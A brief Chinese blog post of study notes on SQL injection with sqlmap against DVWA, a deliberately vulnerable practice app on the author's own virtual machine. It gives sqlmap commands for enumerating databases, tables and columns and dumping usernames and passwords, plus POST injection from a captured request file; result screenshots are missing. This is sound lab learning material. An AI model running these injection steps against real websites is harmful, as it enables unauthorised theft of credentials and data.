sqlmap+DVWA渗透笔记

    学习使用sqlmap,自己搭建了虚拟机环境,利用DVWA网站进行了最简单的注入,如下是自己的学习笔记.

1.尝试注入

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" 

发现跳转到login页面,说明需要Cookie维持会话

2.加入cookie尝试

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"

3.爆出数据库类型

 

4.爆数据库名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" --dbs 

结果:

5.爆表名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa --tables

结果:

6.爆列名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa -T users --columns

结果:

7.爆字段

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa -T users -C user,password --dump

结果:

补充:

  如果是POST注入的话,我们只需要用抓包工具(如burpsuite)抓包,然后将包内容复制到一个.txt文本中,使用如下命令进行注入:

sqlmap.py -r "path\post.txt" -p n  

-r :后接txt文件的路径

-p:指定存在注入的参数n

其他就和get注入一样。

posted @ 2018-05-04 16:11  LullabyT  阅读(167)  评论(0编辑  收藏  举报